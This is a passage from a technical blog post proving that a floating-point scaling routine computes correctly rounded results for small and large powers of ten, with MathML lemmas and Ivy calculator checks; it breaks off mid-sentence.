<i>Proof</i>. If <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math>, then <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>2</mn></msub><mo>∈</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>1</mn><mo stretchy=false>]</mo></mrow></math>,
so the <math><mtext>mod</mtext></math> in <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>2</mn></msub><mo stretchy=false>)</mo><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup></mrow></math>
does nothing (there is no overflow and wraparound),
so <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>2</mn></msub><mo>≥</mo><mn>1</mn></mrow></math>.
By <a href="#lemma4">Lemma 4</a>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>. <math><mo>∎</mo></math>
</div>
<p>
A related lemma helps with <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<div class=lemma id=lemma6>
<p>
<b>Lemma 6</b>. For inexact results, if <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math>, then <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math>.
<p>
<i>Proof</i>. Again there is no overflow,
so <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≥</mo><mn>2</mn></mrow></math>.
<math><mo>∎</mo></math>
</div>
<p>
Now we need to prove either that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math> or that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn></mrow></math> for all inexact results.
We will consider four cases:
<ul>
<li>
[Small Positive Powers] <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>27</mn><mo stretchy=false>]</mo></mrow></math> and <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>.
<li>
[Small Negative Powers] <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>27</mn><mo>,</mo><MO form='prefix'>−</MO><mn>1</mn><mo stretchy=false>]</mo></mrow></math> and <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>.
<li>
[Large Powers, Printing] <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><MO form='prefix'>−</MO><mn>28</mn><mo stretchy=false>]</mo><mo>∪</mo><mo stretchy=false>[</mo><mn>28</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>55</mn></mrow></math>, <math><mrow><mi>m</mi><mo>≥</mo><mn>66</mn></mrow></math>.
<li>
[Large Powers, Parsing] <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><MO form='prefix'>−</MO><mn>28</mn><mo stretchy=false>]</mo><mo>∪</mo><mo stretchy=false>[</mo><mn>28</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, <math><mrow><mi>m</mi><mo>≥</mo><mn>73</mn></mrow></math>.</ul>
<a class=anchor href="#small_positive_powers"><h2 id="small_positive_powers">Small Positive Powers</h2></a>
<div class=lemma id=lemma7>
<p>
<b>Lemma 7</b>. For inexact results and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>27</mn><mo stretchy=false>]</mo></mrow></math> and <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo><</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup></mrow></math>, so the non-zero bits of <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> fit in the high 63 bits.
That implies that the <math><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mn>128</mn></mrow></math>-bit product <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> ends in 65 zero bits.
Since <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, that means <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>0</mn></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>’s low bit is zero.
<p>
Because the result is inexact, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn></mrow></math>, which implies <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn></mrow></math>
(since <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>0</mn></mrow></math>).
Since <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>’s low bit is zero, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math>.
By <a href="#lemma5">Lemma 5</a>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>.
By <a href="#lemma6">Lemma 6</a>, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>. <math><mo>∎</mo></math>
</div>
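<p>
A quick Ivy check of the key fact, at the largest small positive power <math><mrow><mi>p</mi><mo>=</mo><mn>27</mn></mrow></math>:
<pre class='language-ivy'>op pe p = -(127+ceil 2 log 10**-p)
op pm p = ceil (10**p) / 2**pe p
# pm is exact for p in [0,27]; prints 1
(pm 27) == (10**27) / 2**pe 27
# and it ends in at least 65 zero bits; prints 0
(pm 27) mod 2**65
</pre>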
<a class=anchor href="#small_negative_powers"><h2 id="small_negative_powers">Small Negative Powers</h2></a>
<div class=lemma id=lemma8>
<p>
<b>Lemma 8</b>. For inexact results and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>27</mn><mo>,</mo><MO form='prefix'>−</MO><mn>1</mn><mo stretchy=false>]</mo></mrow></math> and <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. Scaling by <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math> cannot introduce inexactness, since it just adds or subtracts from
the exponent. The only inexactness must come from <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>, specifically the <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> part.
Since <math><mrow><mi>p</mi><mo><</mo><mn>0</mn></mrow></math> and <math><mn>1/5</mn></math> is not exactly representable in a binary fraction,
the result is inexact if and only if <math><mrow><mi>x</mi><MO>mod</MO><mn>5</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup><mo>≠</mo><mn>0</mn></mrow></math> (remember that <math><mrow><mo>−</mo><mi>p</mi></mrow></math> is positive!).
<p>
Since <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>127</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>128</mn></msup><mo stretchy=false>)</mo></mrow></math> and <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo><</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mn>2</mn></mrow></msup></mrow></math>, <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>5</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>k</mi></msup></mrow></math> for some <math><mrow><mi>k</mi><mo>≥</mo><mn>130</mn></mrow></math>.
Since <math><mrow><mi>m</mi><mo>+</mo><mi>b</mi><mo>≤</mo><mn>128</mn></mrow></math>, <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>k</mi><mo>−</mo><mo stretchy=false>(</mo><mi>m</mi><mo>+</mo><mi>b</mi><mo stretchy=false>)</mo></mrow></msup><mn>/5</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup><mo stretchy=false>⌋</mo></mrow></mrow></math>
and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>+</mo><mi>b</mi></mrow></msup><mo>·</mo><mo stretchy=false>(</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>k</mi><mo>−</mo><mo stretchy=false>(</mo><mi>m</mi><mo>+</mo><mi>b</mi><mo stretchy=false>)</mo></mrow></msup><MO>mod</MO><mn>5</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup><mo stretchy=false>)</mo><mn>/5</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup></mrow></math>.
That is, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> encodes some non-zero binary fraction with
denominator <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup></mrow></math>.
Note also that, since <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI></mrow></math> is <math><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mn>128</mn></mrow></math> bits and the output is at most 64 bits, we have <math><mrow><mi>m</mi><mo>≥</mo><mn>64</mn></mrow></math>,
so <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>63</mn></mrow></msup><mo>≥</mo><mn>2</mn></mrow></math>.
<p>
That implies<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>+</mo><mi>b</mi></mrow></msup><mo>·</mo><mo stretchy=false>(</mo><mn>5</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>27</mn></mrow></msup><mo>,</mo><mn>1</mn><mo>−</mo><mn>5</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>27</mn></mrow></msup><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>⊂</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>+</mo><mi>b</mi></mrow></msup><mo>·</mo><mo stretchy=false>(</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>63</mn></mrow></msup><mo>,</mo><mn>1</mn><mo>−</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>63</mn></mrow></msup><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>·</mo><mo stretchy=false>(</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>63</mn></mrow></msup><mo>,</mo><mn>1</mn><mo>−</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>63</mn></mrow></msup><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>⊂</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mn>2</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>−</mo><mn>2</mn></mrow></msup><mo stretchy=false>)</mo></mrow></mtd></mtr></mtable></math></div>
<p>
By <a href="#lemma5">Lemma 5</a> and <a href="#lemma6">Lemma 6</a>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>. <math><mo>∎</mo></math>
</div>
<a class=anchor href="#large_powers"><h2 id="large_powers">Large Powers</h2></a>
<p>
That leaves <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><MO form='prefix'>−</MO><mn>28</mn><mo stretchy=false>]</mo><mo>∪</mo><mo stretchy=false>[</mo><mn>28</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>.
There are not many <math><MI>𝑝𝑚</MI></math> to check—under a thousand—but there are far too many <math><mi>x</mi></math> to
exhaustively test that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math> for all of them.
Instead, we will have to be a bit more clever.
<p>
It would be simplest if we could prove that all possible <math><MI>𝑝𝑚</MI></math> and all <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo stretchy=false>)</mo></mrow></math>
result in a non-zero middle,
but that turns out not to be the case.
<p>
For example, using <math><mrow><mi>p</mi><mo>=</mo><MO form='prefix'>−</MO><mn>29</mn></mrow></math>, <math><mrow><mi>x</mi><mo>=</mo><mtext>0x8e151cee6e31e067</mtext></mrow></math> is a problem,
which we can verify using <a href="https://github.com/robpike/ivy">the Ivy calculator</a>:
<pre class='language-ivy'># hex x is the hex formatting of x (as text)
op hex x = '#x' text x
# spaced adds spaces to s between sections of 16 characters
op spaced s = (count s) <= 18: s; (spaced -16 drop s), ' ', -16 take s
# pe returns the binary exponent for 10**p.
op pe p = -(127+ceil 2 log 10**-p)
# pm returns the 128-bit mantissa for 10**p.
op pm p = ceil (10**p) / 2**pe p
spaced hex (pm -29) * 0x8e151cee6e31e067
-- out --
0x7091bfc45568750f 0000000000000000 d81262b60aa6e8b7
</pre>
<p>
We might perhaps think the problem is that <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mn>29</mn></mrow></msup></mrow></math> is too close to the small negative powers,
but positive powers break too:
<pre class='language-ivy'>spaced hex (pm 31) * 0x93997b98618e62a1
-- out --
0x918b5cd9fd69fdc5 0000000000000000 6d00000000000000
</pre>
<p>
We might yet hope that the zeros were not caused by an error carry;
then as long as we force the inexact bit to 1, we could still use the high bits.
And indeed, for both of the previous examples, the zeros are not caused
by an error carry: <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> is all zeros.
But that is not always the case. Here is a middle that is zero due to an error carry
that overflowed into the top bits:
<pre class='language-ivy'>spaced hex (pm 62) * 0xd5bc71e52b31e483
spaced hex ((10**62) * 0xd5bc71e52b31e483) >> (pe 62)
-- out --
0xcfd352e73dc6ddc3 0000000000000000 774bd77b38816199
0xcfd352e73dc6ddc2 ffffffffffffffff e6fdb9b19804952a
</pre>
<p>
Instead of proving the completely general case,
we will have to pick our battles
and focus on the specific cases we need for floating-point conversions.
<p>
We don’t need to try every possible input width below the maximum <math><mi>b</mi></math>.
Looking at <math><mtext>Scale</mtext></math>, it is clear that
the inputs <math><mi>x</mi></math> and <math><mrow><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>k</mi></msup></mrow></math> have the same <math><MI>𝑡𝑜𝑝</MI></math> and <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math>,
and also that <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><mo stretchy=false>(</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>k</mi></msup><mo stretchy=false>)</mo><mo>=</mo><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>k</mi></msup></mrow></math>.
Since the middles are the same, the condition <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math> has
the same truth value for both inputs.
So we can limit our analysis to maximum-width <math><mi>b</mi></math>-bit inputs in <math><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><mo>−</mo><mn>1</mn></mrow></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>)</mo></mrow></math>.
Similarly, we can prove that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math> for <math><mrow><mi>m</mi><mo>≥</mo><mi>k</mi></mrow></math> by proving it for <math><mrow><mi>m</mi><mo>=</mo><mi>k</mi></mrow></math>:
moving more bits from the low end of <math><MI>𝑡𝑜𝑝</MI></math> to the high end of <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math>
cannot make <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> a smaller number.
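<p>
As a quick illustration of the first point (not part of the proof; <code>middleof</code> is a throwaway helper defined here only for this check), widening the error-carry example from above by one bit leaves its middle unchanged:
<pre class='language-ivy'># middleof extracts the m middle bits of x * pm p for a b-bit input x.
op middleof (x b m p) = ((x * pm p) mod 2**b+m) >> b
(middleof 0xd5bc71e52b31e483 64 64 62) is middleof (2*0xd5bc71e52b31e483) 65 64 62
</pre>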
<p>
Proving that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math> for the cases we listed above means proving:
<ul>
<li>
[Printing] (<math><mrow><mi>b</mi><mo>≤</mo><mn>55</mn></mrow></math>, <math><mrow><mi>m</mi><mo>≥</mo><mn>66</mn></mrow></math>.) <br>
For all large <math><mi>p</mi></math> and all <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>54</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>55</mn></msup><mo stretchy=false>)</mo></mrow></math>: <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><mn>55</mn><mo>+</mo><mn>66</mn><mo>=</mo><mn>121</mn></mrow></msup><mo>≥</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mn>55</mn><mo>+</mo><mn>1</mn><mo>=</mo><mn>56</mn></mrow></msup></mrow></math>.
<li>
[Parsing] (<math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, <math><mrow><mi>m</mi><mo>≥</mo><mn>73</mn></mrow></math>.) <br>
For all large <math><mi>p</mi></math> and all <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo stretchy=false>)</mo></mrow></math>: <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><mn>64</mn><mo>+</mo><mn>73</mn><mo>=</mo><mn>137</mn></mrow></msup><mo>≥</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mn>64</mn><mo>+</mo><mn>1</mn><mo>=</mo><mn>65</mn></mrow></msup></mrow></math>.</ul>
<p>
To prove these two conditions, we are going to write an Ivy program to analyze each <math><MI>𝑝𝑚</MI></math> separately,
proving that all relevant <math><mi>x</mi></math> satisfy the condition.
<p>
Ivy has arbitrary-precision rationals and lightweight syntax,
making it a convenient tool for sketching and testing mathematical algorithms,
in the spirit of Iverson’s Turing Award lecture about APL,
“<a href="https://dl.acm.org/doi/pdf/10.1145/1283920.1283935">Notation as a Tool of Thought</a>.”
Like APL, Ivy uses strict right-to-left operator precedence:
<code>1+2*3+4</code> means <code>(1+(2*(3+4)))</code>,
and <code>floor 10 log f</code> means <code>floor (10 log f)</code>.
Operators can be prefix unary like <code>floor</code> or infix binary like <code>log</code>.
Each of the Ivy displays in this post is executable:
you can edit the code and re-run them by clicking the Play button (“▶️”).
A full introduction to Ivy is beyond the scope of this post;
see <a href="https://swtch.com/ivy/demo.html">the Ivy demo</a> for more examples.
<p>
We’ve already started the proof program above by defining <code>pm</code> and <code>pe</code>.
Let’s continue by defining a few more helpers.
<p>
First let’s define <code>is</code>, an assertion for basic testing of other functions:
<pre class='language-ivy'># is asserts that x === y.
op x is y =
x === y: x=x
print x '≠' y
1 / 0
(1+2) is 3
</pre>
<pre class='language-ivy'>(2+2) is 5
-- out --
4 ≠ 5
-- err --
input:1: division by zero
</pre>
<p>
If the operands passed to <code>is</code> are not equal (the triple-equals <code>===</code> does full value comparison),
then <code>is</code> prints them out and divides by zero to halt execution.
<p>
Next, we will set Ivy’s origin to 0 (instead of the default 1),
meaning <code>iota</code> starts counting at 0 and array indexes start at 0,
and then we will define <code>seq x y</code>, which returns the list of integers <math><mrow><mo stretchy=false>[</mo><mi>x</mi><mo>,</mo><mi>y</mi><mo stretchy=false>]</mo></mrow></math>.
<pre class='language-ivy'>)origin 0
# seq x y = (x x+1 x+2 ... y)
op seq (x y) = x + iota 1+y-x
(seq -2 4) is -2 -1 0 1 2 3 4
</pre>
<p>
Now we are ready to start attacking our problem, which is to prove that for a given <math><MI>𝑝𝑚</MI></math>, <math><mi>b</mi></math>, and <math><mi>m</mi></math>,
for all <math><mi>x</mi></math>, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><mo>=</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mi>m</mi></mrow></msup><mo>≥</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup></mrow></math>,
implying <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math>,
at which point we can use Lemma 4.
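<p>
For instance, the first failing example above is exactly this condition failing with <math><mrow><mi>b</mi><mo>=</mo><mi>m</mi><mo>=</mo><mn>64</mn></mrow></math> (a restatement of the earlier output, not new information):
<pre class='language-ivy'># the p = -29 counterexample restated: x * pm mod 2**128 is below 2**(64+1),
# so middle < 2.
(((0x8e151cee6e31e067 * pm -29) mod 2**128) < 2**65) is 1
</pre>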
<p>
We will proceed in two steps, loosely following an approach by
